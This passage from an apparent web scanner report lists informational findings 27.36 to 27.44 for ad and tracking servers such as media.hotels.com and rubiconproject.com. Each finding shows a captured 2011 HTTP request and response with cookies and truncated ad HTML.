user=RCoxODUuMC4wLmkxJTNBMTE0LjEuMCUzQTEyNC4xLjAuaTElM0ExMDMuNC4xLmk2JTNBMTcxLjEuMCUzQTEzMC4xLjEuaTIlM0E0OC4xLjAlM0E5Ny43My4xLmkzJTNBOTguNi40JTNBMTQyLjAuMC5pNCUzQTE5OC4yLjAlM0ExNDUuMC4wLmkyJTNBMjAwLjAuMCUzQTEzNy4wLjAuaTIlM0ExMDguMS4wLmkyJTNBMTkwLjMuMCUzQTE1Mi4wLjAuaTIlM0ExMzQuMC4xJTNBMTk2LjEuMCUzQTIuMi4xJTNBMjA5LjAuMSUzQTE0Ny42LjAuaTYlM0E5Mi4wLjAuaTElM0ExMjEuNTAzLjAuaTclM0ExMzIuMi4wLmkyJTNBMTIyLjEuMC5pMyUzQTEzOC4xLjAlM0ExNDkuMC4wLmkxJTNBMTA0LjAuMSUzQTE5NS4wLjAlN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:28 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe002:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 01:00:28 GMT
Pragma: no-cache
Content-Length: 538
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAY
...[SNIP]...
27.36. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A196.1.0%3A92.0.0.i1%3A121.503.0.i7%3A195.0.0%3A104.0.1%7CHCOM_US; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:10 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe002:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 00:09:10 GMT
Pragma: no-cache
Content-Length: 536
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYS
...[SNIP]...
27.37. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=1394b05b-303b-4e18-8e3a-6c1de94b012e&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=1394b05b-303b-4e18-8e3a-6c1de94b012e&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=1394b05b-303b-4e18-8e3a-6c1de94b012e&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A196.1.0%3A92.0.0.i1%3A121.503.0.i7%3A195.0.0%3A104.0.1%7CHCOM_US; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:10:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: 12-May-2001 12:28:18 GMT
Content-Type: text/html

<!-- v1.3.4038.33275 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE&tile=13
...[SNIP]...
27.38. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; SSLB=1; user=RCoxODUuMC4wLmkxJTNBMTE0LjEuMCUzQTEyNC4xLjAuaTElM0ExMDMuNC4xLmk2JTNBMTcxLjEuMCUzQTEzMC4xLjEuaTIlM0E0OC4xLjAlM0E5Ny43My4xLmkzJTNBOTguNi40JTNBMTQyLjAuMC5pNCUzQTE5OC4yLjAlM0ExNDUuMC4wLmkyJTNBMjAwLjAuMCUzQTEzNy4wLjAuaTIlM0ExMDguMS4wLmkyJTNBMTkwLjMuMCUzQTE1Mi4wLjAuaTIlM0ExMzQuMC4xJTNBMTk2LjEuMCUzQTIuMi4xJTNBMjA5LjAuMSUzQTE0Ny42LjAuaTYlM0E5Mi4wLjAuaTElM0ExMjEuNTAzLjAuaTclM0ExMzIuMi4wLmkyJTNBMTIyLjEuMC5pMyUzQTEzOC4xLjAlM0ExNDkuMC4wLmkxJTNBMTA0LjAuMSUzQTE5NS4wLjAlN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:04:26 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe003:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 01:04:26 GMT
Pragma: no-cache
Content-Length: 1251
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYS
...[SNIP]...
27.39. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:41:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 00:42:26 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Hotwire/retargeting_hotel_results/1851685626/Bottom3/default/empty.gif/4d686437616b364a424c59414378714a?" target="_top"><IMG SRC=
...[SNIP]...
27.40. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=2598&ref2=http%3A//www.manutd.com/en/Club/Sponsors.aspx%3Fsponsorid%3D%7BF745DA14-CB5E-4A81-816A-8DB410E47A75%7D&tzo=360&ms=133 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.aon.com/default.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=F788D26BA3284C76A75E75F5D13F522A; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sun, 02 Oct 2011 23:59:09 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;
27.41. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-15.html

Request

GET /a/7845/12566/22557-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk=8154/13209; ses15=13378^2&13209^2; csi15=3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^149&12566^2&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29334; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599465&3223117.js^3^1317599464^1317599464&3226249.js^10^1317599341^1317599463&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:51:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
27.42. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-2.html

Request

GET /a/7845/12566/22557-2.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk=8154/13209; ses15=13378^2&13209^2; csi15=3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13378^2&12566^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29334; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2122

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
27.43. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/26848-15.html

Request

GET /a/7845/12566/26848-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2&12566^3&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599882&2748761.js^1^1317599431^1317599431&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
27.44. http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://panel.kantarmedia.com
Path:   /0/KantarMedia-Panel/panel/set_panel.html

Request

